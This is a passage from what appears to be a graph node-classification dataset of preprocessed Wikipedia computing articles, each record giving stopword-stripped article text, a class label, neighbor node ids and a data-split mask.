    "text": "Orthogonality_(programming):orthogonality programming computer programming orthogonality means operations change one thing without affecting others term most-frequently used regarding assembly instruction sets orthogonal instruction set orthogonality programming language means relatively small set primitive constructs combined relatively small number ways build control data structures language associated simplicity orthogonal design fewer exceptions makes easier learn read write programs programming language meaning orthogonal feature independent context key parameters symmetry consistency example pointer orthogonal concept example ibm mainframe vax highlights concept ibm mainframe two different instructions adding contents register memory cell another register statements shown first case contents codice_1 added contents memory cell result stored codice_1 second case contents codice_1 added contents another register codice_4 result stored codice_1 contrast set statements vax one statement addition case two operands codice_6 codice_7 registers memory cells combination instruction adds contents codice_6 contents codice_7 storing result codice_6 vax ’ instruction addition orthogonal instructions provided ibm hence easier programmer remember use one provided vax design c language may examined perspective orthogonality c language somewhat inconsistent treatment concepts language structure making difficult user learn use language examples exceptions follow though concept first applied programming language orthogonality since become recognized valuable feature design apis even user interfaces small set composable primitive operations without surprising cross-linkages valuable leading systems easier explain less frustrating use",
    "neighbors": [
      9345,
      11457,
      4483,
      9351,
      10471,
      3529,
      11242,
      2283,
      4107,
      11339,
      7775,
      9710,
      4412,
      6454,
      10617,
      3196,
      1502,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 10062,
    "label": 3,
    "text": "SimpleLinux:simplelinux simplelinux linux distribution uses lzma compression compress system files project started 2007 group malaysian developers simplelinux slackware-based distribution comes live cd persistence version installed medium simplelinux comes multi-tasking operating system runs x window k desktop environment used primary graphical user interface current version k desktop environment used simplelinux kde 3.5 stable extended use compiz fusion also integrated newest simplelinux version simplelinux uses slackpkg install remove upgrade packages network moreover simplelinux provides optional lzm packages official repository applications provided repository compressed lzma",
    "neighbors": [
      10149,
      5067,
      5356,
      499,
      5363,
      5397,
      6583,
      7483,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10063,
    "label": 2,
    "text": "Kexec:kexec kexec abbreviated kernel execution analogous unix/linux kernel call exec mechanism linux kernel allows booting new kernel currently running one essentially kexec skips bootloader stage hardware initialization phase performed system firmware bios uefi directly loads new kernel main memory starts executing immediately avoids long times associated full reboot help systems meet high-availability requirements minimizing downtime feasible implementing mechanism kexec raises two major challenges support allowing signed kernels booted kexec merged version 3.17 linux kernel mainline released october 5 2014 disallows root user load arbitrary code via kexec execute complementing uefi secure boot in-kernel security mechanisms ensuring signed linux kernel modules inserted running kernel",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      3323,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      4934,
      3911,
      6988,
      5975,
      11095,
      4968,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5000,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      1515,
      3055,
      5105,
      2036,
      5620,
      3062,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 10064,
    "label": 3,
    "text": "Ninja_JaJaMaru-kun:ninja jajamaru-kun released nintendo japanese virtual console december 26 2006 pal regions september 21 2007 part ninja week hanabi festival promotion released north american virtual console october 22 2007 first time game made release outside japan respective regions primary inspiration behind robot ninja haggleman 8-bit style game retro game challenge nintendo ds game stars brother ninja-kun ninja-kid princess sakura kidnapped damazu-dayuu ninja-kun away journey task falls young jajamaru-kun game player starts three lives run jump throw shurikens game divided stages four floors eight ghost-like enemies japanese folklore names displayed stage begins sakura-hime damazu placed unreachable top screen enemies use various projectiles one cause player lose life jajamaru-kun lands top enemy simply temporarily stunned vice versa enemy defeated offscreen spirit appear ascend top screen collected disappeared receive points vary depending enemy among eight enemies one top floor tougher beat others player need careful deal sakura sometimes drop petals player collect damazu sometimes run around dropping bombs advance next stage player must defeat eight enemies using shurikens bricks yield items include three types power-ups collected gamapa-kun giant frog summoned jajamaru-kun riding completely invincible able eat enemies three sakura petals collected player go bonus stage jajamaru-kun bottom damazu top damazu drops bombs player throws shurikens upward player manages hit damazu bonus points awarded jajamaru-kun hit bomb goes next stage",
    "neighbors": [
      616,
      2121,
      9006,
      10931,
      5942
    ],
    "mask": "Test"
  },
  {
    "node_id": 10065,
    "label": 2,
    "text": "Transaction_Management_eXecutive:transaction management executive transaction management executive tmx ncr corporation proprietary transaction processing system running ncr tower 5000-series systems based motorola 680xx cpus system used mainly financial institutions 1980s 1990s basic features tmx operating system listed ncr tower 5000 systems also capable running unix svr3 version",
    "neighbors": [
      1952,
      9985,
      4546,
      2179,
      9762,
      8262,
      2345,
      8393,
      7983,
      2995,
      11447,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10066,
    "label": 3,
    "text": "Spelunker_(video_game):spelunker video game originally released micrographic image atari 8-bit family 1983 game later ported commodore 64 re-released broderbund 1984 european publishing rights licensed ariolasoft arcade version followed 1985 game released nintendo entertainment system december 6 1985 japan september 1987 north america msx 1986 sequel released arcades nes september 18 1987 called irem japan player must walk jump increasingly challenging parts cave working finite supply fresh air could replenished various points cave hazards include bats drop deadly guano player ghost haunting cave appearing randomly attempting take player shadow world player character send blast air push ghost away however renders player character immobile seconds thus vulnerable dangers depleting air supply objects collect include sticks dynamite flares keys precise positioning jumping play key factors successfully completing game cave spelunker divided six levels although levels connect seamlessly forming one large map game clearly signals level change certain points showing name next level giving player bonus consisting extra life varying number points splash screen game original atari features excerpt modest mussorgsky pictures exhibition background music versions game including atari re-release feature different title theme nes msx versions additional music gameplay computer gaming world 1985 called spelunker thoroughly enjoyable game ... class act game re-released virtual console north america march 17 2008 europe september 5 2008 wii regions june 6 2013 wii u north america june 27 2013 nintendo 3ds sony computer entertainment japan released spelunker hd playstation 3 downloadable game playstation network store received playstation store best sales award 2009 sony computer entertainment japan game remake nes port high definition graphics 100 levels 10 large caves 10 levels 2015 square enix released free-to-play sequel titled spelunker world playstation 4 playstation vita 2017 new title based spelunker world announced nintendo switch released april 20 2017 japan later released worldwide spelunker party october 19 2017 although spelunker party released physically japan worldwide release digital-only 2016 collaboration happened spelunker neptunia series resulted unlockable minigame mode called neplunker megadimension neptunia vii consists two special dungeons mixes normal gameplay spelunker gameplay mini-game became notorious players due normal controls game suited platforming lack proper tutorial led many players experiencing unintentional deaths game returns series viir playstation vr-compatible remake playstation 4",
    "neighbors": [
      10931,
      2540,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 10067,
    "label": 2,
    "text": "BatteryMAX_(idle_detection):batterymax idle detection batterymax idle detection system used computer power management operating system control developed digital research inc. european development centre edc hungerford uk created address new genre portable personal computers laptops ran battery power also integral part novell palmdos 1.0 operating system tailored early palmtops 1992 power saving laptop computers traditionally relied hardware inactivity timers determine whether computer idle would typically take several minutes computer could identify idle behavior switch lower power consumption state monitoring software applications within operating system batterymax able reduce time taken detect idle behavior minutes microseconds moreover switch power states around 18 times second user keystrokes technique named dynamic idle detection includes halting stopping cpu periods microseconds hardware event occurs restart dr dos 5.0 first personal computer operating system incorporate idle detection system power management invented british engineers roger gross john p. constant august 1989 us patent describing idle detection system filed 9 march 1990 granted 11 october 1994 despite taking early lead protection patent batterymax enjoy significant commercial success sidelined disarray followed integration digital research novell inc. 1991 1992 three years invention software power management operating system control became ubiquitous following launch advanced power management apm microsoft intel batterymax uses technique dynamic idle detection provide power savings detecting application whether idle switching power states entering low power mode therefore extending battery life product batterymax employs layered model detection software encapsulated dos character device driver called idle contains hardware-dependent code support dynamic idle detection either linked dr-dos operating system bios loaded dynamically using config.sys device directive overloading built-in default driver versions dr-dos since version 5.0 contained dynamic idle detection support inside operating system kernel operating system believes application idle calls idle bios/driver layer executes custom code written computer manufacturer third parties verify request switch power states using device driver concept batterymax integrated hardware-related power management facilities might provided underlying hardware including interfacing apm acpi system bioses power states computer dependent vary manufacturer manufacturer power savings made number ways including slowing/stopping processor clock speed shutting power complete sub-systems switching power states codice_1 driver uses available hardware assistance detect application accessing components system example application may polling serial port updating graphics screen case device driver determines application fact idle overrides kernel call switch power states passing information back layers allowing application execution resume application idle waiting external event occur example keystroke mouse movement fixed amount time pass dr-dos kernel monitors dos api calls building profile applications behavior certain combinations api calls suggest application idle codice_1 driver able make subtle distinction program genuinely idle instance one polling keyboard tight loop one active also polling keyboard test abort key pressed driver makes distinction monitoring time taken go idle time within specified period driver assumes program idle e.g polling tight loop key pressed time outside specified limit driver assumes processing occurred polling keyboard allows application execution resume without switching power states local variable idle_cntdn specifies time actual time taken go idle compared value variable dynamically calculated initialization recalculated periodically idle detection technique first used improve multi-tasking single-tasking dos applications digital research multi-tasking/multi-user concurrent dos 386 cdos386 operating system programs written single-tasking operating systems ms-dos/pc dos go endless loops interrupted example waiting user press key whilst problem process waiting run wastes valuable processor time could used programs multi-tasking/multi-user environment like cdos386 applications designed multi-tasking environment use api calls sleep idle period time normal dos applications idle detection must used concurrent dos 386 release included idle detection function operating system kernel monitored dos api calls determine whether application useful work fact idle idle process suspended allowing dispatcher schedule another process execution batterymax idle detection patent played important role alleged patent infringement relating software power management operating system control 15 may 2009 st. clair intellectual property consultants inc. filed civil action 09-354 united states district court d. delaware defendants acer inc. dell inc. gateway inc. lenovo group inc. 18 september 2009 filed civil action 09-704 apple inc. toshiba corporation inc actions alleged infringement several u.s. patents owned relating software power management operating system control st. clair asserted henry fung invented software power management operating system control alleged companies infringed st. clair patents therefore owed st. clair royalty payments microsoft intervened behalf defendants filed declaratory judgment st. clair 7 april 2010 seeking judgments non-infringement invalidity fung patents d.i 1 c.a 10-282 intel corporation filed intervention behalf defendants granted 4 june 2010 d.i 178 c.a 09-354 seattle law firm perkins coie llp acting defendants discovered batterymax gross idle detection patent prior art search gross patent earlier priority date fung patents proven would undermine st. clair case 28 february 2011 gross hired intel subject matter expert provide expert witness testimony defendants case gross provided evidence expert report fung invented software power management operating system control sited idle detection patent existence batterymax proof st clair filed motion exclude opinions concerning batterymax attempt gross expert report dismissed 29 march 2013 district court denied st. clair motion declaring gross testimony defendants admissible stating court agrees defendants sufficient corroborating evidence batterymax available public prior fung patents priority date court concludes even batterymax predate fung patents mr gross testimony … would relevant helpful fact finder obviousness inquiry ”",
    "neighbors": [
      10113,
      518,
      6921,
      3216,
      2840,
      2201,
      2729,
      7849,
      11562,
      7983,
      178,
      4409,
      7999,
      4548,
      10083,
      5220,
      1515,
      2672,
      3056,
      4337,
      9329,
      4727,
      1400,
      11513,
      6778
    ],
    "mask": "Test"
  },
  {
    "node_id": 10068,
    "label": 6,
    "text": "Working_directory:working directory computing working directory process directory hierarchical file system dynamically associated process sometimes called current working directory cwd e.g bsd function current directory process refers file using simple file name relative path opposed file designated full path root directory reference interpreted relative current working directory process example process working directory /rabbit-shoes asks create file foo.txt end creating file /rabbit-shoes/foo.txt computer file systems every directory entry usually named points directory dos unix command shells well microsoft windows command line interpreters cmd.exe windows powershell working directory changed using cd chdir commands unix shells pwd command outputs full pathname current working directory equivalent command dos windows cd chdir without arguments whereas unix cd used without arguments takes user back his/her home directory environment variable pwd unix/linux shells pseudo-environment variables cd windows command.com cmd.exe os/2 dos _cwd _cwds _cwp _cwps 4dos 4os2 4nt etc used scripts one need start external program microsoft windows file shortcuts ability store working directory command.com dr-dos 7.02 higher provides echos variant echo command omitting terminating linefeed used create temporary batchjob storing current directory environment variable like cd later use example alternatively multiuser dos dr-dos 7.02 higher various internal external commands support parameter /b batch modifies output commands become suitable direct command line input redirecting batch file usage parameter commands using input another command chdir would issue directory path like codice_1 command like chdir /b would issue codice_2 instead chdir /b retdir.bat would create temporary batchjob allowing return directory later current working directory also displayed p token codice_3 command keep prompt short even inside deep subdirectory structures dr-dos 7.07 command.com supports w token display deepest subdirectory level default prompt p g would result f.e codice_4 codice_5 prompt n w g would instead yield codice_6 codice_7 respectively similar facility using w w added 4dos well dos absolute paths current working directories volumes internaly stored array-like data structure called current directory structure cds gets dynamically allocated boot time hold necessary number slots drives defined lastdrive structure imposes length-limit 66 characters full path current working directory thus implicitly also limits maximum possible depth subdirectories dos plus older issues dr dos dr dos 6.0 1991 limitation due implementation using dos emulation top concurrent dos- thus cp/m-86- derived kernel internally organized subdirectories relative links parent directories instead absolute paths since palmdos dr dos 6.0 since 1992 higher switched use cds maximum compatibility dos programs well faced limitations present doses programming languages provide interface file system functions operating system including ability set change working directory program c language posix function codice_8 effects system call changes working directory argument text string path new directory either absolute relative old one available called process set working directory function languages visual basic usually spelled codice_9 unlike windows api posix c function neither java programming language java virtual machine supports codice_8 directly change request remained open decade team responsible java considered alternatives though 2008 request denied limited support introduced affecting first codice_11 later codice_12",
    "neighbors": [
      4870,
      1801,
      6797,
      8975,
      3856,
      6674,
      2201,
      11033,
      6813,
      9762,
      7847,
      5677,
      7983,
      178,
      11442,
      9665,
      3522,
      8517,
      8262,
      4423,
      4298,
      847,
      10959,
      1750,
      4441,
      9946,
      4966,
      8298,
      621,
      4850,
      3571,
      5492,
      9972,
      4727,
      5754,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 10069,
    "label": 1,
    "text": "Imieliński-Lipski_algebra:imieliński-lipski algebra imieliński-lipski algebras extension relational algebra onto tables different types null values used operate relations incomplete information imieliński-lipski algebras defined satisfy precise conditions semantically meaningful extension usual relational operators projection selection union join operators relations operators relations various kinds null values conditions require system safe sense incorrect conclusion derivable using specified subset f relational operators complete sense valid conclusions expressible relational expressions using operators f fact derivable system example well known 3-valued logic approach deal null values supported treatment nulls values sql complete see ullman book show let take sql query q sql query q return empty set results 3-valued semantics currently adopted variants sql case sql null never equal constant – case neither “ spring ” “ fall ” “ winter ” winter semester school codice_1 evaluate maybe codice_2 disjunction maybe maybe evaluates maybe true thus igor part answer course neither rohit igor returned answer indeed regardless semester igor took networks class matter unknown value null selection condition true “ igor ” missed sql sql answer ’ complete according completeness requirements specified tomasz imieliński witold lipski 'incomplete information relational databases also argued 3-valued logic true false maybe never provide guarantee complete answer tables incomplete information three algebras satisfy conditions safety completeness defined imielinski-lipski algebras codd-tables algebra v-tables algebra conditional tables c-tables algebra codd-tables algebra based usual codd singe null values table example codd-table codd-table algebra supports projection positive selections also demonstrated il84 possible correctly extend relational operators codd-tables example basic operation join extendable codd-tables possible define selections boolean conditions involving negation preserve completeness example queries like query q supported order able extend relational operators expressive form null value representation needed tables called v-table v-tables algebra based many different marked null values variables allowed appear table v-tables allow show value may unknown different tuples example table gaurav igor order unknown beer two unknown bars may may different – remain unknown gaurav jane frequent unknown bad y1 thus instead one null value use indexed variables skolem constants v-tables algebra shown correctly support projection positive selection negation occurring selection condition union renaming attributes allows processing arbitrary conjunctive queries desirable property enjoyed v-table algebra relational operators tables performed exactly way case usual relations example conditional table c-table shown additional column “ con ” boolean condition involving variables null values – v-tables following table c-table conditional tables algebra mainly theoretical interest supports projection selection union join renaming closed world assumption also handle operator difference thus support relational operators imieliński-lipski algebras introduced tomasz imieliński witold lipski jr. 'incomplete information relational databases",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      9634,
      4263,
      2344,
      7080,
      10413,
      10286,
      9397,
      3004,
      10048,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      4065,
      9828,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
    "mask": "Test"
  },
  {
    "node_id": 10070,
    "label": 4,
    "text": "Oulu_University_Secure_Programming_Group:oulu university secure programming group oulu university secure programming group ouspg research group university oulu studies evaluates develops methods implementing testing application system software order prevent discover eliminate implementation level security vulnerabilities pro-active fashion focus implementation level security issues software security testing ouspg active independent academic research group computer engineering laboratory department electrical information engineering university oulu since summer 1996 ouspg known participation protocol implementation security testing called robustness testing using protos mini-simulation method protos co-operated project vtt number industrial partners project developed different approaches testing implementations protocols using black-box i.e functional testing methods goal support pro-active elimination faults information security implications promote awareness issues develop methods support customer driven evaluation acceptance testing implementations improving security robustness products attempted supporting development process notable result protos project result c06-snmp test suite discovered multiple vulnerabilities snmp work done protos continued protos-genome applies automatic structure inference combined domain specific reasoning capabilities enable automated black-box program robustness testing tools without prior knowledge protocol grammar work resulted large number vulnerabilities found archive file antivirus products group produced two spin-off companies codenomicon continues work protos clarified networks work frontier",
    "neighbors": [
      5636,
      2213,
      11333,
      3887,
      2095,
      4435,
      3133
    ],
    "mask": "Train"
  },
  {
    "node_id": 10071,
    "label": 4,
    "text": "Credential_Management:credential management credential management also referred credential management system cms established form software used issuing managing credentials part public key infrastructure pki cms software used governments enterprises issuing strong two-factor authentication 2fa employees citizens cms integrates components pki provide one joined-up solution departments issue manage credentials wide selection devices including smart cards usb keys smartphones laptops desktop computers credential management also proposed application programming interface api development world wide web consortium standardizing aspects password managers used web user agents web browsers applications create store use modify username password combinations logins addition management federated credentials single sign-on tokens user agents api developed w3c web application security working group working draft status since april 2016 recommendation-track proposal expected become accepted standard may undergo significant changes occurs credential management api already extended webauthn web authentication proposal reached candidate recommendation status april 2018 adds ability handle public-key authentication common modern web browsers able store automatically enter usernames passwords website logins though often used suboptimal heuristics guessing form fields data supposed filled/stored resulting inconsistent sometimes faulty behavior browsers also trouble filling login forms federated identities user connecting website uses account third-party web service like facebook google twitter authenticate provide identity information credential management specification also aims streamline process changing passwords locally stored password client updated time modified server google chrome included support credential management since version 51 released may 2016 opera included support since version 44 released april 2017 mozilla firefox includes subset api support webauthn since version 60 released may 2018 august 2017 working draft user agents supporting credential management api must implement credential store persistent storage credential objects also include credential chooser allow users interact objects allow deny use logins credentials ideally name favicon associated perhaps along related information help distinguish website service used well ability differentiate credentials multiple accounts site api defines four main javascript methods expose codice_1 interface codice_2 codice_3 codice_4 codice_5 also specifies top-level codice_6 interface object descendant codice_7 codice_8 object types webauthn also defines codice_9 interface object api available user agent connected secure https website browsers still implement auto-filling login information non-secure sites must allow sites benefit automation api provides since could lead accidental exposure passwords credentials addition api access allowed top-level windows within codice_10 elements nested browsing contexts codice_2 method used constructing credential objects memory codice_12 triggers writing object credential store following successful login codice_13 requests potentially relevant credentials storage may presented user credential chooser retrieval requests made user agents required prompt user authorization default though user interface allow flag set allows silent authorization without presenting prompt website reset flag codice_14 method recommended use logging",
    "neighbors": [
      3462,
      8584,
      7212,
      10831,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 10072,
    "label": 2,
    "text": "Basic_telecommunications_access_method:basic telecommunications access method basic telecommunications access method btam low-level programming interface specified ibm use ibm system/360 start-stop binary synchronous telecommunications terminals later ibm specified higher-level interfaces qtam tcam btam superseded vtam systems network architecture sna devices btam continued supported later iterations system architecture ibm finally withdrew support 2000 btam requires application program transaction processing system handle almost every detail protocol harder using higher-layer protocol permits interfacing non-standard devices non-standard ways btam access method interactively communicating remote terminals usually connected front end processor 270x although support local channel-attached 3270 terminals included btam dynamically builds channel command words ccws reading writing polling terminals deals specific responses terminals according success failure communication channel btam key component ibm early transaction processing systems mtcs cics ims underpinned rise online transaction processing many large commercial banks insurance companies unusual btam later developed access methods vtam co-exist supporting different devices simultaneously transaction processing system material section taken ibm system/360 operating system basic telecommunications access method gc30-2004-6 btam programming requires detailed knowledge characteristics specific terminals used dcb macro used define communications line group br codice_1 br codice_2 coded specify binary synchronous bisync line many operands specify unique characteristics attached terminals terminal list specified codice_3 macro identifies terminals attached line macro specifies line characteristics—start-stop bisync point-to-point multipoint leased line dial — type polling required— wrap around open polling characters telephone number used identify specific remote device line coded codice_4 macro used modify information specific device list execution wrap-around polling list cause device list polled sequentially channel response received reduces load cpu continuous polling programmer specify buffer pool data structure used hold messages transmitted terminals btam construct pool automatically programmer construct pool various ways build macro format pool static dynamic storage previously acquired codice_5 macro acquire format storage automatically read operations btam automatically obtain one buffers pool store received message write operation programmer needs code codice_6 obtain number buffers necessary build output message either case codice_7 used free buffers completion read write tha codice_8 codice_9 include translation tables translate non ebcdic character codes standard os/360 codice_10 codice_11 macros used initiate terminate processing btam line codice_12 macro reinitialize line whatever reason failed open successfully btam provides large number options codice_13 codice_14 macros depending line terminal types current status operations read initial reset read conversational read repeat write initial write break write continue transparent specified codes codice_15 read initial read write operation executed asynchronously channel following read write codice_16 codice_17 macro required wait completion retrieve ending status codice_18 macro cancels outstanding read and/or stops polling line amongst many devices supported btam handles",
    "neighbors": [
      10508,
      11024,
      5658,
      5936,
      10040,
      2616,
      4546,
      1219,
      11131,
      1478,
      8393,
      8138,
      10958,
      3669,
      868,
      7272,
      4586,
      10094,
      3443,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10073,
    "label": 1,
    "text": "Hong_Kong_shipping_register:hong kong shipping register port hong kong deep water port located southern china one hub ports serving south-east east asia region gateway mainland china city hong kong began colony united kingdom free port became international trade center connecting land sea transport china countries port mature infrastructure well-developed air-sea-land transport helps hong kong maintain position international trade centre transshipment hub part 1997 transfer sovereignty hong kong britain china ship registration system made adjustments 1990 marine department set separate system hong kong shipping register ordinance hong kong ship registration amended accordingly new measures reduce operation cost ship management also improve service quality new system increased hong kong competitive advantage attracting ships port january 2009 hong kong registered ships reached 40.56 million tons 1,380 vessels",
    "neighbors": [
      10408,
      5419
    ],
    "mask": "Test"
  },
  {
    "node_id": 10074,
    "label": 9,
    "text": "Philip_Van_Cleave:philip van cleave philip van cleave born 1952 kankakee illinois american gun rights advocate computer programmer president virginia citizens defense league vcdl 2018 appeared show america instructed preschool children use guns fictitious show van cleave grew illinois 16 mother bought first gun .410 bore shotgun 21 volunteered reserve deputy sheriff san antonio purchased first .357 magnum ruger service revolver van cleave joined virginia citizens defense league 1995 year founded june 2004 received gun rights defender month award citizens committee right keep bear arms van cleave proponent strong interpretation second amendment united states constitution believing open access guns guarantees individual americans right defend put 2004 take back country ever become totalitarian state although gun rights groups citizens committee right keep bear arms criticized vcdl members open carry en masse van cleave defended practice saying helps educate citizens police virginia gun laws also defended vcdl advocacy passing concealed carry laws allow college students carry guns campus permit saying virginia tech shooting one adult students armed building would much better chance somebody would stopped madman 2010 reported pressuring virginia lawmakers legalize gun carrying drinking among non-police officers well police officers long drunk carrying gun arguing 're allowed drink two classes citizens van cleave interviewed 60-minutes nightline washington post host places van cleave appeared daily show 2013 segment gun control australia show interviewed john oliver said gun control end day none works went say united states high gun crime rates many guns oliver replied point 2018 van cleave appeared fake promotional pro-gun rights video advocating arming children toddlers sacha baron cohen showtime spoof interview series america baron cohen disguised israeli ex-mossad agent invited van cleave washington dc receive friend israel award honor israel 70th anniversary fictitious pro-israel group created baron cohen segment van cleave endorses “ kinderguardians ” phony program teach arm schoolchildren young three protect classroom segment van cleave argued since children developed conscience would make effective soldiers notable pro-gun politicians duped fake award appearing segment including former us senate majority leader trent lott former us congressman joe walsh former chief justice alabama supreme court roy moore",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 10075,
    "label": 9,
    "text": "Scope_resolution_operator:scope resolution operator computer programming scope enclosing context values expressions associated scope resolution operator helps identify specify context identifier refers particularly specifying namespace specific uses vary across different programming languages notions scoping many languages scope resolution operator written languages notably influenced modula-3 including python go modules objects scope resolution within modules special case usual object member access usual method operator codice_1 used scope resolution languages notably c++ ruby feature scope resolution method access interact various ways see examples php scope resolution operator also called paamayim nekudotayim second word colloquial corruption נקודתיים means “ double colon ” hebrew name paamayim nekudotayim introduced israeli-developed zend engine 0.5 used php 3 although confusing many developers speak hebrew still used php 7 sample error message similar error also occur scope resolution operator present example attempting check whether constant empty triggers error php 5.4 error messages concerning scope resolution operator still include name clarified meaning somewhat less obvious ways trigger error example attempting use following invalid php expression ruby scope resolution specified using namespaces classes modules scope also affected sigils preface variable names",
    "neighbors": [
      1152,
      3553,
      5059,
      8644,
      8554,
      2029,
      10510,
      1973,
      4341,
      10143,
      1435,
      9245,
      6335
    ],
    "mask": "None"
  },
  {
    "node_id": 10076,
    "label": 7,
    "text": "FMOD:fmod fmod proprietary sound effects engine authoring tool video games applications developed firelight technologies play mix sounds diverse formats many operating systems fmod sound system supplied programmer api authoring tool similar digital audio workstation fmod consists following technologies legacy products fmod sound system advanced plugin architecture used extend support audio formats develop new output types e.g streaming fmod available multiple license schemes fmod written portable c++ thus run many different pc mobile gaming console platforms including microsoft windows x86 x86-64 macos ios linux x86 x86-64 android blackberry wii wii u 3ds nintendo switch xbox xbox 360 xbox one playstation 2 playstation 3 playstation 4 playstation portable playstation vita google native client fmod contains support amd trueaudio sound blaster hardware acceleration fmod play back following audio formats aiff asf asx dls flac fsb fmod sample bank format m3u midi mod mp2 mp3 ogg vorbis pls s3m vag ps2/psp format wav wax windows media audio redirector wma xm xma xbox 360 well raw audio data fmod integrated primary sound-effects system following video game engines fmod used many high-profile commercial games since release partial list",
    "neighbors": [
      2208,
      2368,
      162,
      8071,
      8937,
      5356,
      6797,
      10284,
      7983,
      10316,
      8561,
      499,
      823,
      8185,
      1916,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 10077,
    "label": 7,
    "text": "Bytemark:bytemark bytemark uk-based server hosting datacentre provider headquartered york united kingdom founded 2002 bytemark computer consulting ltd bytemark first provider virtual machines cloud hosting user-mode linux 2003 2012 bytemark launched bigv public cloud platform designed completely in-house using open source software 2013 bytemark moved £1.2 million datacentre headquarters york yo26 2017 bigv platform renamed bytemark cloud september 2018 bytemark acquired iomart group plc yo26 datacentre uses fresh-air cooling common uk shortlisted innovation medium data center datacenterdynamics awards emea 2013 bytemark servers built using efficient power supplies certified 80plus scheme requires power supplies least 80 efficient 100 rated load reduce bias found traditional recruitment processes bytemark developed anonymous recruitment process 2015 2014 bytemark named one top 50 fastest grown tech companies north northern tech awards revenue growth 44 financially bytemark turned £2.5 million 2013 2014 grew £3 million 2015 bytemark awarded fair tax mark bytemark history contributing supporting free software bytemark offers ongoing discount least 5 free software publishers bytemark support libreoffice provision build server 2009 bytemark became supporter xbmc 2012 bytemark started supporting cyanogenmod build servers 2013 bytemark contributed hosting services worth £150,000 debian project used debian since company founded bytemark also supports openstreetmap dns services servers support version control mailing lists help pages bytemark also support projects social good including sponsoring servers mysociety including fixmystreet theyworkforyou whatdotheyknow",
    "neighbors": [
      4194,
      4734
    ],
    "mask": "Test"
  },
  {
    "node_id": 10078,
    "label": 7,
    "text": "Firefox_Sync:firefox sync firefox sync originally branded mozilla weave browser synchronization feature allows users partially synchronize bookmarks browsing history preferences passwords filled forms add-ons last 25 opened tabs across multiple computers keeps user data mozilla servers according mozilla data encrypted way third party even mozilla access user information also possible user host firefox sync servers indeed entity firefox sync originally add-on mozilla firefox 3.x seamonkey 2.0 built-in feature since firefox 4.0 seamonkey 2.1 firefox sync built top firefox accounts firefox 29 therefore firefox 29 later sync firefox 28 earlier firefox home companion application iphone ipod touch based firefox sync technology allowed users either device access firefox browsing history bookmarks recent tabs also included firefox awesomebar location bar firefox home browser application launches pages either webkit web viewer safari mozilla pulled firefox home app store september 2012 stating would focus resources projects company subsequently released source code firefox home underlying synchronization software december 2014 mozilla announced designing version firefox ios due apple application review policies firefox use built-in ios webkit-based rendering framework instead gecko browser able sync firefox browsing history bookmarks recent tabs mozilla also offers synchronization server application use firefox sync users businesses prefer host synchronization data",
    "neighbors": [
      1664,
      9732,
      6791,
      9736,
      1295,
      7951,
      2836,
      10006,
      11418,
      9757,
      7983,
      1713,
      7861,
      11449,
      5054,
      9152,
      9281,
      1346,
      10057,
      2893,
      7889,
      5078,
      6231,
      10078,
      482,
      10722,
      9063,
      8169,
      5612,
      10860,
      6133,
      7543,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10079,
    "label": 2,
    "text": "Network_Driver_Interface_Specification:network driver interface specification network driver interface specification ndis application programming interface api network interface cards nics jointly developed microsoft 3com corporation mostly used microsoft windows however open-source ndiswrapper project evil driver wrapper projects allow many ndis-compliant nics used linux freebsd netbsd magnussoft zeta derivative beos supports number ndis drivers ndis forms logical link control llc sublayer upper sublayer osi data link layer layer 2 therefore ndis acts interface media access control mac sublayer lower sublayer data link layer network layer layer 3 ndis library functions often referred wrapper hides underlying complexity nic hardware serves standard interface level 3 network protocol drivers hardware level mac drivers ndis versions supported various windows versions follows traffic accepted nic controlled ndis miniport driver various protocols tcp/ip implemented ndis protocol drivers single miniport may associated one protocols means traffic coming miniport may received parallel several protocol drivers example winpcap adds second protocol driver selected miniport order capture incoming packets furthermore possible simulate several virtual nics implementing virtual miniport drivers send receive traffic single physical nic one example virtual miniport driver usage add virtual nics different virtual lan implementations assume drivers received buffers one must treat incoming buffers read driver changes packet content must allocate buffers miniport type hardware driver part windows driver model usb audio scsi network card adapters usually source binary compatible windows 98 windows 2000 hardware specific control access hardware specific bus class driver another driver type ndis intermediate driver intermediate drivers sit in-between mac ip layers control traffic accepted nic practice intermediate drivers implement miniport protocol interfaces miniport driver protocol driver actually communicate corresponding miniport protocol interfaces reside intermediate driver design enables adding several chained intermediate drivers miniport protocol drivers therefore driver vendors assume interface send traffic implemented last driver chain order write applications using ndis one use samples accompany microsoft windows driver kit wdk passthru sample good starting point intermediate drivers implements necessary details required driver type passes traffic next driver chain",
    "neighbors": [
      10243,
      2569,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1575,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      8266,
